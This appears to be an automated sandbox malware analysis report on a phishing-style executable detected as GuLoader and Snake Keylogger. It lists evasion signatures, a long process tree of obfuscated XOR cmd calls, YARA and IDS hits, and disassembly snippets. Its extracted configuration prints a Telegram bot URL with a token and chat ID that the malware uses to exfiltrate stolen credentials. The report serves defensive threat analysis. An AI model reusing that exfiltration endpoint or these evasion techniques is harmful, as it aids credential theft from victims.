Edit tour

Windows Analysis Report
Revised PI_2024.exe

Overview

General Information

Sample name:	Revised PI_2024.exe
Analysis ID:	1479211
MD5:	92a02307f4c44a671c89b1b3d217d019
SHA1:	96c200cc228a4af2d13fdb058974ba669826441f
SHA256:	e9b50ec3d579aa6668fcfacf94e2ecfc4e1a7384ad5aae86d2ecfd0ccea52363
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

Machine Learning detection for sample

Mass process execution to delay analysis

Obfuscated command line found

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Too many similar processes found

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64native

Revised PI_2024.exe (PID: 5984 cmdline: "C:\Users\user\Desktop\Revised PI_2024.exe" MD5: 92A02307F4C44A671C89B1B3D217D019)

cmd.exe (PID: 4252 cmdline: cmd.exe /c set /a "250^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 2820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 6332 cmdline: cmd.exe /c set /a "244^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 6776 cmdline: cmd.exe /c set /a "227^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 5752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 3276 cmdline: cmd.exe /c set /a "255^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 6876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 3084 cmdline: cmd.exe /c set /a "244^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 6660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 2804 cmdline: cmd.exe /c set /a "253^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 4052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 280 cmdline: cmd.exe /c set /a "130^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 3480 cmdline: cmd.exe /c set /a "131^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 3928 cmdline: cmd.exe /c set /a "139^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 5052 cmdline: cmd.exe /c set /a "139^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 1404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 7600 cmdline: cmd.exe /c set /a "242^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 4864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 5240 cmdline: cmd.exe /c set /a "195^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 5420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 4560 cmdline: cmd.exe /c set /a "212^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 840 cmdline: cmd.exe /c set /a "208^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 1600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 6332 cmdline: cmd.exe /c set /a "197^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 4528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 6776 cmdline: cmd.exe /c set /a "212^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 6248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 1268 cmdline: cmd.exe /c set /a "247^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 5452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 3084 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 2304 cmdline: cmd.exe /c set /a "221^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 3484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 1396 cmdline: cmd.exe /c set /a "212^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 4980 cmdline: cmd.exe /c set /a "240^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 1568 cmdline: cmd.exe /c set /a "153^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 5752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 4668 cmdline: cmd.exe /c set /a "220^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 6876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 3400 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 5616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 1940 cmdline: cmd.exe /c set /a "195^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 4932 cmdline: cmd.exe /c set /a "133^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 1600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 3920 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 6092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 2704 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 2784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 6768 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 6876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 8080 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 3484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 4684 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 4528 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 1404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 6104 cmdline: cmd.exe /c set /a "201^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 4720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 600 cmdline: cmd.exe /c set /a "137^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 6668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 8164 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 4684 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 4864 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 4464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 1420 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 2304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 1608 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 1940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 3692 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 3440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 5052 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 6812 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 6104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 6424 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 4180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 7596 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 4728 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 2660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 7624 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 6412 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 4720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 4344 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 2304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 6248 cmdline: cmd.exe /c set /a "193^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 1940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 2544 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 3440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 6660 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 6104 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 1404 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 6000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 6876 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 6092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 1248 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 5500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 6812 cmdline: cmd.exe /c set /a "133^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 5420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 4252 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 3276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 4344 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 4180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 6248 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 5052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 2544 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 624 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 5820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 3920 cmdline: cmd.exe /c set /a "201^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 6976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 280 cmdline: cmd.exe /c set /a "137^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 1940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 5424 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Conhost.exe (PID: 2660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

Revised PI_2024.exe (PID: 2496 cmdline: "C:\Users\user\Desktop\Revised PI_2024.exe" MD5: 92A02307F4C44A671C89B1B3D217D019)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7403026399:AAFfphUcCNwXUYyJxcHC8R68pFj9jInz4Bk/sendMessage?chat_id=6419839739"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7403026399:AAFfphUcCNwXUYyJxcHC8R68pFj9jInz4Bk/sendMessage"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000083.00000002.86892585605.000000003418C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000083.00000002.86892585605.00000000340B6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.82255738297.00000000004F1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GuLoader_3	Yara detected GuLoader	Joe Security
00000000.00000002.82255738297.0000000000514000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GuLoader_3	Yara detected GuLoader	Joe Security
00000083.00000002.86892585605.00000000341C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000083.00000002.86892585605.00000000341C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000083.00000002.86892585605.0000000033F21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.82257067560.000000000511A000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: Revised PI_2024.exe PID: 5984	JoeSecurity_GuLoader_3	Yara detected GuLoader	Joe Security
Process Memory Space: Revised PI_2024.exe PID: 2496	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Revised PI_2024.exe PID: 2496	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: Revised PI_2024.exe PID: 2496	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 7 entries

Suricata Signatures

ETPRO MALWARE Snake Keylogger Telegram Exfil - Source IP: 192.168.11.20 - Destination IP: 149.154.167.220

Timestamp:	2024-07-23T12:54:26.900562+0200
SID:	2853006
Source Port:	49841
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000083.00000002.86892585605.0000000033F21000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7403026399:AAFfphUcCNwXUYyJxcHC8R68pFj9jInz4Bk/sendMessage?chat_id=6419839739"}
Source: Revised PI_2024.exe.2496.131.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7403026399:AAFfphUcCNwXUYyJxcHC8R68pFj9jInz4Bk/sendMessage"}

Multi AV Scanner detection for submitted file

Source: Revised PI_2024.exe

ReversingLabs: Detection: 60%

Machine Learning detection for sample

Source: Revised PI_2024.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EFB768 CryptUnprotectData,		131_2_33EFB768
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EFBDF0 CryptUnprotectData,		131_2_33EFBDF0

Source: Revised PI_2024.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.67.152:443 -> 192.168.11.20:49833 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.168.11.20:49839 -> 104.21.67.152:443 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 172.253.63.113:443 -> 192.168.11.20:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.253.115.132:443 -> 192.168.11.20:49831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49841 version: TLS 1.2

Source: Revised PI_2024.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 0_2_00405464 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405464
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 0_2_00405EA8 FindFirstFileA,FindClose,	0_2_00405EA8
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 0_2_00402645 FindFirstFileA,	0_2_00402645
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_00402645 FindFirstFileA,	131_2_00402645
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_00405464 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	131_2_00405464
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_00405EA8 FindFirstFileA,FindClose,	131_2_00405EA8

Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 0015E627h	131_2_0015E438
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 0015EFB1h	131_2_0015E438
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	131_2_0015E00D
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 0015FA41h	131_2_0015F780
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	131_2_0015D7F8
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	131_2_0015DE2B
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 33EFFDF7h	131_2_33EFFB50
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 33EF15D8h	131_2_33EF11C0
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 33EF1011h	131_2_33EF0D60
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 33EFF99Fh	131_2_33EFF6F8
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 33EFF547h	131_2_33EFF2A0
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 33EFF0EFh	131_2_33EFEE48
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then mov esp, ebp	131_2_33EFDA50
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 33EFEC97h	131_2_33EFE9F0
